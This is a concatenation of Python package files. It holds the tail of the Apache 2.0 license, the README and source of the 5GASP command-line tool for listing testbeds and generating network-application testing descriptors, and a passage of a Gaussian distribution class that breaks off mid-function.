include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
Copyright 2022 Guillaume Belanger
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
| 5g-core-common-schemas | /5g_core_common_schemas-1.0.9-py3-none-any.whl/5g_core_common_schemas-1.0.9.dist-info/LICENSE.md | LICENSE.md |
# 5GASP CLI
## How to run
You can find the code inside the */5gasp-cli/src/* directory.
To list all CLI commands, run:
```
5gasp-cli --help
```
To list all parameters of a command, run:
```
5gasp-cli COMMAND --help
```
### CLI Commands
#### List all testbeds
```
5gasp-cli list-testbeds
```
#### List all available tests
```
5gasp-cli list-available-tests
```
#### Generate a testing descriptor:
```
5gasp-cli create-testing-descriptor
```
This command has the following options:
* One or more NSDs (Network Service Descriptors) can be passed to infer connection point tags from, using the following command:
```
5gasp-cli create-testing-descriptor --infer-tags-from-nsd <nsd_location>
```
* The path of the generated descriptor can be passed using:
```
5gasp-cli create-testing-descriptor --output-filepath <path_to_file>
```
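For example, a single invocation can set both options at once (placeholder values shown):
```
5gasp-cli create-testing-descriptor --infer-tags-from-nsd <nsd_location> --output-filepath <path_to_file>
```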
> **_NOTE:_** Both options can be used simultaneously | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/README.md | README.md |
from typing import List, Optional
from .helpers.beatiful_prints import PrintAsTable, PrintAsPanelColumns
from rich.prompt import Prompt, Confirm
from rich.text import Text
from rich.console import Console
import typer
from .CICDManagerAPIClient import apli_client as CICD_API_Client
from .DescriptorParser.parser import ConnectionPointsParser
from .TestingDescriptorGenerator.descriptor_generator import \
TestingDescriptorGenerator
from .helpers import constants as Constants
from .helpers import prompts
app = typer.Typer()
state = {"verbose": False}
def _list_testbeds(api_client, print_info=False, centered=False):
testbeds = api_client.get_all_testbeds()
# Print table with the available testbeds
if print_info:
table = PrintAsTable(
header=["ID", "Name", "Description"],
rows=[
[t["id"], t["name"], t["description"]]
for t
in testbeds
]
)
table.print(centered=centered)
return testbeds
def _list_tests(api_client, testbed_id, print_info=False):
tests = api_client.get_tests_per_testbed(testbed_id)
if print_info:
panels = PrintAsPanelColumns(
panels=[t.to_panel() for t in tests]
)
panels.print()
return tests
@app.command()
def create_testing_descriptor(
output_filepath: str = typer.Option(
default="testing-descriptor.yaml",
help="Output filepath"
),
infer_tags_from_nsd: Optional[List[str]] = typer.Option(
default=None
)
):
console = Console()
text = Text()
# 1. Check if the developer wants to infer tags from an NSD
if infer_tags_from_nsd:
# Information Prompt
prompts.connection_points_information_prompt()
# Parse connection points information
tags_parser = ConnectionPointsParser(infer_tags_from_nsd)
existing_connect_points = tags_parser.connection_points
print("\nThe following NSDs can be used for inferring connection " +
"points:"
)
table = PrintAsTable(
header=["NSD's File Path", "NSD ID", "Inferred Connection Points"],
rows=[
[
nsd_file_path,
nsd_info["ns_id"],
"\n".join(nsd_info["connection_points"])
]
for nsd_file_path, nsd_info
in existing_connect_points.items()
]
)
table.print()
prompts.connection_point_keys(
list(existing_connect_points.values())[0]["connection_points"][0]
)
# 2. Ask the developer if he wishes to proceed
proceed = Confirm.ask(
"\nDo you wish to proceed with the Test Descriptor's creation?"
)
# Exit if the developer does not want to proceed
if not proceed:
return
# 3. Ask for the Testing Descriptor initial information
netapp_name = input("\n" + Constants.USER_PROMPTS.NETAPP_NAME.value)
ns_name = input(Constants.USER_PROMPTS.NS_NAME.value)
api_client = CICD_API_Client.CICDManagerAPIClient()
# Print table with the available testbeds
# List Testbeds
testbeds = _list_testbeds(
api_client=api_client,
print_info=True,
centered=True
)
# Prompt to choose a testbed
testbed_id = Prompt.ask(
"\nIn which testbed do you want to validate your Network " +
"Application?",
choices=[t["id"] for t in testbeds]
)
tests = _list_tests(
api_client=api_client,
testbed_id=testbed_id,
print_info=False
)
if not infer_tags_from_nsd:
text = Text("\nAs there was no NSD passed, there are no connection " +
"points to be inferred. You can enter them manually."
, style="bold")
console.print(text)
generator = TestingDescriptorGenerator(
connection_points=existing_connect_points if infer_tags_from_nsd else None,
netapp_name=netapp_name,
ns_name=ns_name,
testbed_id=testbed_id,
tests=tests,
output_filepath=output_filepath
)
generator.create_testing_descriptor()
@app.command()
def list_testbeds():
'''
List available testbeds
'''
api_client = CICD_API_Client.CICDManagerAPIClient()
# List Testbeds
testbeds = _list_testbeds(
api_client=api_client,
print_info=True
)
# Ask the user if he wishes to list the available test cases in each of
# the available testbeds
should_list_tests = Confirm.ask(
"\nDo you wish to list the available tests for one of these testbeds?",
)
# If the answer is 'yes'
if should_list_tests:
testbed_id = Prompt.ask(
"\nFor which testbed do you wish to list the available tests",
choices=[t["id"] for t in testbeds]
)
print(f"\nAvailable tests in testbed '{testbed_id}':\n")
_list_tests(
api_client=api_client,
testbed_id=testbed_id,
print_info=True
)
@app.command()
def list_available_tests():
'''
List available tests to developer
'''
prompts.tests_per_testbed_prompt()
# Print all the available testbeds
prompts.tests_testbeds_list_prompt()
ApiClient = CICD_API_Client.CICDManagerAPIClient()
# List Testbeds
testbeds = _list_testbeds(
api_client=ApiClient,
print_info=True,
centered=True
)
# Prompt to choose a testbed
testbed_id = Prompt.ask(
"\nFor which testbed do you wish to list the available tests",
choices=[t["id"] for t in testbeds]
)
# List testbed's available tests
tests = _list_tests(
api_client=ApiClient,
testbed_id=testbed_id,
print_info=False
)
while True:
panels = PrintAsTable(
header=["ID", "Test Name", "Test Description"],
rows=[
[str(i+1), tests[i].name, tests[i].description]
for i
in range(len(tests))
]
)
prompts.display_tests_for_testbed(testbed_id)
panels.print()
# Does the user wishes to see additional tests information?
prompts.do_you_wish_to_see_test_information_prompt()
test_details = Prompt.ask(
"For which test do you wish to see additional information? ",
choices=[str(i) for i in range(1, len(tests)+1)] + ["exit"]
)
if test_details == "exit":
break
panels = PrintAsPanelColumns(
panels=[tests[int(test_details)-1].to_panel(expand=True)]
)
panels.print()
@app.callback()
def main(
verbose: bool = False,
ci_cd_manager_url: str = typer.Option(
default=Constants.CI_CD_SERVICE_URL,
help="CI/CD Manager URL to override the default one."
)
):
if verbose:
print("Will write verbose output")
state["verbose"] = True
# Set the ci_cd_manager_url
Constants.CI_CD_SERVICE_URL = ci_cd_manager_url
if __name__ == "__main__":
app() | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/main.py | main.py |
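

# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not generated output): the commands defined
# above are exposed through Typer. The command names below follow Typer's
# default underscore-to-dash conversion; the module invocation path is an
# assumption and may differ from the installed console entry point.
#
#   python -m src.main list-testbeds
#   python -m src.main list-available-tests
#   python -m src.main --ci-cd-manager-url http://ci-cd-manager.example list-testbeds
# ---------------------------------------------------------------------------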
from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich.align import Align
from rich.console import Group
from ..helpers.connection_point_tags import CONNECTION_POINT_TAGS
from ..helpers.beatiful_prints import PrintAsTable
from rich.prompt import Prompt
def test_cases_operation():
prompt = Text()
console = Console()
prompt.append("\nWhich Operation do you want to perform?\n")
prompt.append("(add) ", style="bold")
prompt.append("Add new Test Case\n")
prompt.append("(info) ", style="bold")
prompt.append("Get more information regarding a Test\n")
prompt.append("(show) ", style="bold")
prompt.append("Show already configured Test Cases\n")
prompt.append("(edit) ", style="bold")
prompt.append("Edit Test Cases\n")
prompt.append("(finish) ", style="bold")
prompt.append("Finish the Test Cases Configuration\n")
console.print(prompt)
operation = Prompt.ask(
"Which Operation do you want to perform? ",
choices=["add", "info", "show", "edit", "finish"]
)
return operation
def tests_per_testbed_prompt():
console = Console()
group = Group(
Align.center("[b]In 5GASP, each testbed has its own specific " +
"tests.[/b]"),
Align.center(" "),
Align.center("Thus, we don't provide and overall view of the tests " +
"we have in our ecosystem, but rather a testbed-level " +
"view of the tests."),
Align.center("[b]This way, you must first choose a testbed on where " +
"yourNetApp shall be deployed, valdiated and " +
"certified.[/b]"),
Align.center("Only after choosing the testbed you may list the " +
"tests available in that facility."),
)
console.print(
Align.center(
Panel(
renderable=group,
title="5GASP's Tests",
expand=True
)
)
)
def tests_testbeds_list_prompt():
console = Console()
console.print(
Align.center(
"\n[b]Testbeds Available for Network Applications Testing:[/b]\n"
)
)
def display_tests_for_testbed(testbed):
console = Console()
console.print(
"\n[b]" +
f"The Testbed '{testbed}' provides the following tests:".title() +
"[/b]\n"
)
def do_you_wish_to_see_test_information_prompt():
console = Console()
console.print(
"\n[b]You can see additional information about each of the tests.\n" +
"If you don't want to do so, just type 'exit'.[b]"
)
def connection_points_information_prompt():
console = Console()
group = Group(
Align.center("[b]5GASP's CLI only supports inferring " +
"connection points when they refer to a VNF.[/b]"),
Align.center(" "),
Align.center("We currently do not support CNF-related connection " +
"points."),
Align.center("If you want to create a Testing Descriptor for a " +
"CNF-based Network Application, please contact us at " +
"[b][email protected][/b], and we will support your " +
"though the development of your Testing Descriptor."
),
)
console.print(
Align.center(
Panel(
renderable=group,
title="Connection Points",
expand=True
)
)
)
def connection_point_keys(example_connection_point):
console = Console()
group = Group(
Align.center("[b]From the previously presented Connection Points it " +
"is possible to define several template tags that " +
"shall be rendered after the deployment of the Network " +
"Application.[/b]"),
Align.center(" "),
Align.center("For instance, if a developer wishes to perform a " +
"test that requires information on the IPs of the " +
"Network Application VNFs, the devoloper may define a " +
"template tag, which will be rendered to the IP of a " +
"certain VNF " +
"({{<ns_id>|<vnf_id>|<connection_point>|ip-address}})."),
Align.center(" "),
)
print()
console.print(
Align.center(
Panel(
renderable=group,
title="Connection Points - Template Tags",
expand=True
)
)
)
print("\nThe available template tags are the following:")
tmp_example_connection_point = example_connection_point[:-2]
header = ["Connection Point Key", "Description", "Example",
"Example Value"]
rows = []
for tag, info in CONNECTION_POINT_TAGS.items():
rows.append(
[
tag,
info["description"],
tmp_example_connection_point + "|" + tag + "}}",
str(info["example"])
]
)
print_as_table = PrintAsTable(header=header, rows=rows)
print_as_table.print() | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/helpers/prompts.py | prompts.py |
import yaml
from typing import List
class ConnectionPointsParser:
"""
    Parses NSD files and infers connection point template tags from them.
"""
validated_connection_points = None
_interfaces = None
def __init__(self, nsd_filepaths: List[str]):
"""
Constructor
"""
self.base_nsd_filepaths = set(nsd_filepaths)
self.validated_connection_points = {}
self._interfaces = []
self.infer_connection_points()
def infer_connection_points(self):
for filepath in self.base_nsd_filepaths:
self.parse_descriptor(filepath)
def parse_descriptor(self, nsd_filepath):
'''
Retrieves all the tags from the given descriptor
'''
try:
connection_points = []
with open(nsd_filepath, "r") as file:
descriptor = yaml.safe_load(file)
for network_service in descriptor['nsd']['nsd']:
ns_id = network_service['id']
for df in network_service['df']:
connection_points += self.infer_connection_points_from_df(
ns_id=ns_id,
df=df,
)
# save connection points
self.validated_connection_points[nsd_filepath] = {
"ns_id": ns_id,
"connection_points": connection_points
}
except Exception as e:
print("\nThe following exception occurred when trying to infer " +
f"connection points for the NSD '{nsd_filepath}': {e}.")
def infer_connection_points_from_df(self, ns_id, df):
connection_points = []
for vnf in df['vnf-profile']:
vnf_id = vnf['id']
for constituent in vnf['virtual-link-connectivity']:
for constituent_cpd in constituent["constituent-cpd-id"]:
interface_id = constituent_cpd['constituent-cpd-id']
connection_points.append(
"{{deployment_info|" + f"{ns_id}|{vnf_id}|" +
f"{interface_id}" + "}}"
)
return connection_points
@property
def connection_points(self):
'''
        Get the inferred connection points
'''
return self.validated_connection_points | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/DescriptorParser/parser.py | parser.py |
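

if __name__ == "__main__":
    # Minimal usage sketch (illustrative): infer connection point template
    # tags from one or more NSD files. The file path below is a hypothetical
    # placeholder, not a file shipped with this package.
    example_parser = ConnectionPointsParser(["./example-nsd.yaml"])
    for nsd_path, nsd_info in example_parser.connection_points.items():
        print(f"NSD: {nsd_path} (NS id: {nsd_info['ns_id']})")
        for connection_point in nsd_info["connection_points"]:
            print(f"  {connection_point}")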
# OS
import os
from ..helpers.beatiful_prints import PrintAsTable, PrintAsPanelColumns
from ..helpers import prompts
import yaml
from rich.prompt import Prompt, FloatPrompt, IntPrompt, Confirm
from rich.text import Text
from rich.console import Console
from ..CICDManagerAPIClient.test_classes import TestCase
from ..helpers.connection_point_tags import CONNECTION_POINT_TAGS
from ..helpers.base_testing_descriptor import BASE_TESTING_DESCRIPTOR
class TestingDescriptorGenerator:
def __init__(self, netapp_name, ns_name, testbed_id, tests,
output_filepath, connection_points=None):
self.netapp_name = netapp_name
self.ns_name = ns_name
self.testbed_id = testbed_id
self.tests = tests
self.output_filepath = output_filepath
self.connection_points = connection_points
self.test_cases = []
self.tests_cases_ids_ordered_by_user = []
self.last_test_id = 1
def _show_test_info(self):
test_id = Prompt.ask(
"For which test do you wish to see additional information? ",
choices=[str(i) for i in range(1, len(self.tests)+1)]
)
panels = PrintAsPanelColumns(
panels=[self.tests[int(test_id)-1].to_panel(expand=True)]
)
panels.print()
def __test_variable_input(self, test_variable):
value = None
prompt = "Which value would you like to assign to the variable "\
f"'{test_variable.name}'?"
if test_variable.can_be_injected_by_the_nods and self.connection_points:
connection_points = []
connection_point_keys = list(CONNECTION_POINT_TAGS.keys())
for cps in self.connection_points.values():
connection_points += cps["connection_points"]
# Prepare table printing
tmp_smaller_list = connection_points \
if len(connection_points) < len(connection_point_keys) \
else connection_point_keys
diff = abs(len(connection_points) - len(connection_point_keys))
tmp_smaller_list += [" "]*diff
# Print Connection Points
panels = PrintAsTable(
header=["Connection Points", "Connection Point Keys"],
rows=[
[connection_points[i], connection_point_keys[i]]
for i
in range(len(connection_points))
]
)
panels.print()
# Ask for user's input
# If there are possible values, ask for one of them
if len(test_variable.possible_options) != 0:
value = Prompt.ask(prompt, choices=test_variable.possible_options)
elif test_variable.type == "str":
value = Prompt.ask(prompt)
elif test_variable.type == "float":
value = FloatPrompt.ask(prompt)
elif test_variable.type == "int":
value = IntPrompt.ask(prompt)
console = Console()
variable_value_text = Text(f"{test_variable.name} = {value}\n",
style="red")
console.print(variable_value_text)
return value
def _add_test(self):
console = Console()
test_id = Prompt.ask(
"Which test do you want to add to your Testing Descriptor? ",
choices=[str(i) for i in range(1, len(self.tests)+1)]
)
test_id = int(test_id) - 1
test = self.tests[test_id]
test_info = Text()
test_info.append(f"Configuring test '{test.name}'...\n", style="bold")
test_info.append("Test name: ", style="bold")
test_info.append(test.name + "\n")
test_info.append("Test Description: ", style="bold")
test_info.append(test.description + "\n")
test_info.append("\nConfiguring Test Variables...\n", style="bold")
console.print(test_info)
# Save Test Case Definition
test_case = TestCase(test=test, test_case_id=self.last_test_id)
for test_variable in test.test_variables:
console.print(
test_variable.to_panel(test.name)
)
            if test_variable.can_be_injected_by_the_nods and self.connection_points:
                text = Text("This variable can be injected by the " +
                            "NODS. You may rely on the inferred " +
                            "connection points.", style="bold")
                console.print(text)
            elif test_variable.can_be_injected_by_the_nods:
                text = Text("This variable can be injected by the " +
                            "NODS, but no NSD was passed. You can inject the" +
                            " values manually, or you can pass a descriptor" +
                            " to the CLI.", style="bold")
                console.print(text)
value = self.__test_variable_input(test_variable)
# Save Test Case Definition
test_case.add_test_variable(
key=test_variable.name,
value=value
)
description = Prompt.ask("How would you describe this Test Case")
test_case.description = description
console.print(test_case.to_panel(show_configured=True))
self.test_cases.append(test_case)
self.last_test_id += 1
def _show_test_cases(self):
# Print Header
console = Console()
header = Text("\nYou already configured the following Test Cases:",
style="bold")
console.print(header)
# Print all configured Test Cases
panels = [tc.to_panel(expand=False) for tc in self.test_cases]
panel_columns = PrintAsPanelColumns(panels)
panel_columns.print()
def _finish_test_cases_definition(self):
console = Console()
info = Text("\nYou have finished the Test Cases Definition.\n")
info.append("You can now choose if your Test Cases should be " +
"executed in a specific order, or if the execution " +
"order is irrelevant.", style="bold")
console.print(info)
execution_order_is_required = Confirm.ask(
"\nDo you wish to execute the defined Test Cases in a specific " +
"order?"
)
if execution_order_is_required:
self._set_tests_execution_order()
else:
self.tests_cases_ids_ordered_by_user = [
tc.test_case_id
for tc
in self.test_cases
]
def _set_tests_execution_order(self):
self._show_test_cases()
# Print Header
console = Console()
header = Text("\nYou can now define the execution order of the " +
"configured Test Cases.\nTo do so, please keep " +
"choosing the next test that shall be executed, until " +
"you have chosen all Test Cases.", style="bold"
)
console.print(header)
# Initial Test Cases IDs
test_cases_ids = sorted([tc.test_case_id for tc in self.test_cases])
tests_cases_ids_ordered_by_user = []
while len(test_cases_ids) > 0:
test_case_id = Prompt.ask(
"Which is the next Test Case to execute? ",
choices=[str(i) for i in test_cases_ids]
)
test_case_id = int(test_case_id)
tests_cases_ids_ordered_by_user.append(test_case_id)
test_cases_ids.remove(test_case_id)
test_cases_ids = sorted(test_cases_ids)
# Present Test Cases Execution Order to the User
order_info = Text("\nThe Test Cases will be performed according " +
"to the following order: ", style="bold")
order_info.append(str(tests_cases_ids_ordered_by_user), style="red")
console.print(order_info)
self.tests_cases_ids_ordered_by_user = tests_cases_ids_ordered_by_user
return tests_cases_ids_ordered_by_user
def _edit_test_cases_delete(self):
test_id = Prompt.ask(
"Which Test Case do you want to delete ('back' to go " +
"back to the previous menu)?",
choices=[str(tc.test_case_id) for tc in self.test_cases] +
["back"],
)
if test_id == "back":
return
delete = Confirm.ask("Are you sure you want to delete the " +
f"Test Case with the ID {test_id}?"
)
# Delete the Test Case
if delete:
for tc in self.test_cases:
if str(tc.test_case_id) == test_id:
del self.test_cases[self.test_cases.index(tc)]
break
def _edit_test_cases_edit(self):
console = Console()
test_id = Prompt.ask(
"Which Test Case do you want to edit ('back' to go " +
"back to the previous menu)?",
choices=[str(tc.test_case_id) for tc in self.test_cases] +
["back"],
)
if test_id == "back":
return
# gather the test case
test_case = None
for tc in self.test_cases:
if str(tc.test_case_id) == test_id:
test_case = tc
break
console.print(Text("\nTest Case Information:", style="bold"))
panels = PrintAsPanelColumns(panels=[test_case.test.to_panel()])
panels.print()
console.print(Text("\nCurrent Test Case Definition:", style="bold"))
panels = PrintAsPanelColumns(
panels=[test_case.to_panel()]
)
panels.print()
for variable, value in test_case.test_variables.items():
info = Text()
info.append("\nTest Variable: ", style="bold")
info.append(variable + "\n")
info.append("Current Value: ", style="bold")
info.append(str(value) + "\n")
console.print(info)
edit = Confirm.ask("Do you want to edit this variable " +
f"({variable})?")
if edit:
# print Test Information
new_value = Prompt.ask("New Value")
test_case.add_test_variable(variable, new_value)
def _edit_test_cases(self):
# Print Header
self._show_test_cases()
show_test_cases = False
op = ""
while op != 'back':
op = Prompt.ask(
"Do you want to edit or delete a Test Case ('back' "
"to go back to the main menu)? ",
choices=["edit", "delete", "back"],
)
if op == "back":
break
elif op == "delete":
if show_test_cases:
self._show_test_cases()
self._edit_test_cases_delete()
elif op == "edit":
self._edit_test_cases_edit()
show_test_cases = True
def _test_cases_prompt(self):
panels = PrintAsTable(
header=["ID", "Test Name", "Test Description"],
rows=[
[str(i+1), self.tests[i].name, self.tests[i].description]
for i
in range(len(self.tests))
]
)
prompts.display_tests_for_testbed(self.testbed_id)
panels.print()
def _confirm_testing_descriptor_output_file(self):
console = Console()
location_ok = False
while not location_ok:
info = Text()
info.append("\nThe Testing Descriptor will be saved in the " +
"following file: ", style="bold")
info.append(self.output_filepath + "\n")
console.print(info)
change_filepath = Confirm.ask(
"Do you wish to save the Testing Descriptor in a different " +
"file?")
if not change_filepath:
location_ok = True
else:
file_path = Prompt.ask(
"Provide the file path where the Testing Descriptor " +
"should be saved ('back' to go back to the main menu)?")
if file_path == "back":
continue
elif os.path.isfile(file_path):
location_ok = True
self.output_filepath = file_path
elif os.path.isdir(file_path):
self.output_filepath = os.path.join(
file_path,
"testing-descriptor.yaml"
)
location_ok = True
else:
info = Text("\nImpossible to save the Testing Descriptor " +
"in the specified location " +
f"{file_path}! File or directory does not exist!",
style="red")
console.print(info)
#info = Text()
#info.append("\nThe Testing Descriptor will be saved in the " +
# "following file: ", style="bold")
#info.append(self.output_filepath + "\n")
#console.print(info)
return True
    def _save_testing_descriptor(self):
testing_descriptor = BASE_TESTING_DESCRIPTOR
testing_descriptor["test_info"]["netapp_id"] = self.netapp_name
testing_descriptor["test_info"]["network_service_id"] = self.ns_name
testing_descriptor["test_info"]["testbed_id"] = self.testbed_id
testing_descriptor["test_info"]["description"] = "Testing "\
f"Descriptor for the {self.netapp_name} Network Application"
testcases = []
for tc in self.test_cases:
tc_dict = {
"testcase_id": tc.test_case_id,
"type": tc.test.test_type,
"scope": tc.test.test_type,
"name": tc.test.id,
"description": tc.description,
"parameters": []
}
for key, value in tc.test_variables.items():
tc_dict["parameters"].append(
{
"key": key,
"value": value
}
)
testcases.append(tc_dict)
testing_descriptor["test_phases"]["setup"]["testcases"] = testcases
testing_descriptor["test_phases"]["execution"][0]["executions"]\
[0]["testcase_ids"] = self.tests_cases_ids_ordered_by_user
with open(self.output_filepath, 'w') as output_file:
yaml.dump(
testing_descriptor,
output_file,
default_flow_style=False,
sort_keys=False
)
console = Console()
console.print(Text("\nGenerated Testing Descriptor:", style="bold"))
print(
yaml.dump(
testing_descriptor,
default_flow_style=False,
sort_keys=False
)
)
info = Text()
info.append("\nThe Testing Descriptor was saved in the " +
"following file: ", style="bold")
info.append(self.output_filepath)
console.print(info)
def _test_cases_menu(self):
while True:
# Show testcases
self._test_cases_prompt()
# Present the Menu to the developer
op = prompts.test_cases_operation()
if op == "add":
self._add_test()
if op == "show":
self._show_test_cases()
if op == "info":
self._show_test_info()
if op == "edit":
self._edit_test_cases()
if op == "finish":
self._finish_test_cases_definition()
if self._confirm_testing_descriptor_output_file():
break
def create_testing_descriptor(self):
self._test_cases_menu()
        self._save_testing_descriptor()
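

# ---------------------------------------------------------------------------
# Wiring sketch (illustrative only; this module uses package-relative imports
# and needs live data from the CI/CD Manager, so it is not runnable on its
# own). The generator expects the already-collected answers plus the Test
# objects of the chosen testbed; all values below are hypothetical.
#
#   generator = TestingDescriptorGenerator(
#       netapp_name="my-netapp",
#       ns_name="my-ns",
#       testbed_id="my-testbed",
#       tests=tests,                      # list of Test objects from the API client
#       output_filepath="testing-descriptor.yaml",
#       connection_points=None,           # or the dict built by ConnectionPointsParser
#   )
#   generator.create_testing_descriptor()
# ---------------------------------------------------------------------------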
import requests
from ..helpers import constants as Constants
from ..CICDManagerAPIClient.test_classes import Test
class CICDManagerAPIClient:
def __init__(self):
self.base_url = Constants.CI_CD_SERVICE_URL
def get_all_testbeds(self):
'''
Retrieves testbeds from the CI/CD Manager API.
Returns
-------
List of testbeds.
'''
# 1. List only the testbeds that have tests
response = self.__make_get_request(
Constants.CI_CD_SERVICE_URL +
Constants.CI_CD_SERVICE_URL_ENDPOINTS.ALL_TESTS.value
)
response_data = response.json()["data"]
testbeds_with_tests = response_data["tests"].keys()
# 2.Gather the testbeds description
response = self.__make_get_request(
Constants.CI_CD_SERVICE_URL +
Constants.CI_CD_SERVICE_URL_ENDPOINTS.ALL_TESTBEDS.value
)
response_data = response.json()["data"]
return [
testbed
for testbed
in response_data["testbeds"]
if testbed["id"] in testbeds_with_tests
]
def get_all_tests(self):
'''
Retrieves all tests from the CI/CD Manager API.
Returns
-------
List of all tests.
'''
path = Constants.ALL_TESTS_PATH
url = f"{self.base_url}/{path}"
try:
response = requests.get(url)
response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print(f"HTTP Error: {errh}")
return None
except requests.exceptions.ConnectionError as errc:
print(f"Connection Error: {errc}")
return None
except requests.exceptions.Timeout as errt:
print(f"Timeout Error: {errt}")
return None
except requests.exceptions.RequestException as err:
print(f"Unknown Error: {err}")
return None
else:
return response.json()['data']['tests']
def get_tests_per_testbed(self, testbed: str):
        '''
        Retrieves the tests available in a given testbed from the CI/CD
        Manager API.
        Parameters
        ----------
        testbed : str
            Testbed ID
        Returns
        -------
        List of Test objects available in that testbed.
        '''
response = self.__make_get_request(
endpoint=Constants.CI_CD_SERVICE_URL +
Constants.CI_CD_SERVICE_URL_ENDPOINTS.ALL_TESTS.value,
params={"testbed": testbed}
)
tests = []
for test_info in response.json()['data']['tests'][testbed].values():
t = Test()
t.load_from_dict(test_info)
tests.append(t)
return tests
def __make_get_request(self, endpoint, params=None):
try:
response = requests.get(
url=endpoint,
params=params
)
response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print(f"HTTP Error: {errh}")
return None
except requests.exceptions.ConnectionError as errc:
print(f"Connection Error: {errc}")
return None
except requests.exceptions.Timeout as errt:
print(f"Timeout Error: {errt}")
return None
except requests.exceptions.RequestException as err:
print(f"Unknown Error: {err}")
return None
else:
return response | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/CICDManagerAPIClient/apli_client.py | apli_client.py |
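

if __name__ == "__main__":
    # Minimal usage sketch (illustrative): query the CI/CD Manager for the
    # available testbeds and for the tests of the first one. This performs
    # real HTTP requests against Constants.CI_CD_SERVICE_URL, so it only
    # works when that service is reachable; run it with "python -m" so the
    # package-relative imports above resolve.
    client = CICDManagerAPIClient()
    testbeds = client.get_all_testbeds()
    print("Available testbeds:", [t["id"] for t in testbeds])
    if testbeds:
        tests = client.get_tests_per_testbed(testbeds[0]["id"])
        print("Tests in", testbeds[0]["id"], ":", [t.name for t in tests])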
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Gaussian(Distribution):
""" Gaussian distribution class for calculating and
visualizing a Gaussian distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats extracted from the data file
"""
def __init__(self, mu=0, sigma=1):
Distribution.__init__(self, mu, sigma)
def calculate_mean(self):
"""Function to calculate the mean of the data set.
Args:
None
Returns:
float: mean of the data set
"""
avg = 1.0 * sum(self.data) / len(self.data)
self.mean = avg
return self.mean
def calculate_stdev(self, sample=True):
"""Function to calculate the standard deviation of the data set.
Args:
sample (bool): whether the data represents a sample or population
Returns:
float: standard deviation of the data set
"""
if sample:
n = len(self.data) - 1
else:
n = len(self.data)
mean = self.calculate_mean()
sigma = 0
for d in self.data:
sigma += (d - mean) ** 2
sigma = math.sqrt(sigma / n)
self.stdev = sigma
return self.stdev
def plot_histogram(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.hist(self.data)
plt.title('Histogram of Data')
plt.xlabel('data')
plt.ylabel('count')
def pdf(self, x):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
return (1.0 / (self.stdev * math.sqrt(2*math.pi))) * math.exp(-0.5*((x - self.mean) / self.stdev) ** 2)
def plot_histogram_pdf(self, n_spaces = 50):
"""Function to plot the normalized histogram of the data and a plot of the
probability density function along the same range
Args:
n_spaces (int): number of data points
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
mu = self.mean
sigma = self.stdev
min_range = min(self.data)
max_range = max(self.data)
# calculates the interval between x values
interval = 1.0 * (max_range - min_range) / n_spaces
x = []
y = []
# calculate the x values to visualize
for i in range(n_spaces):
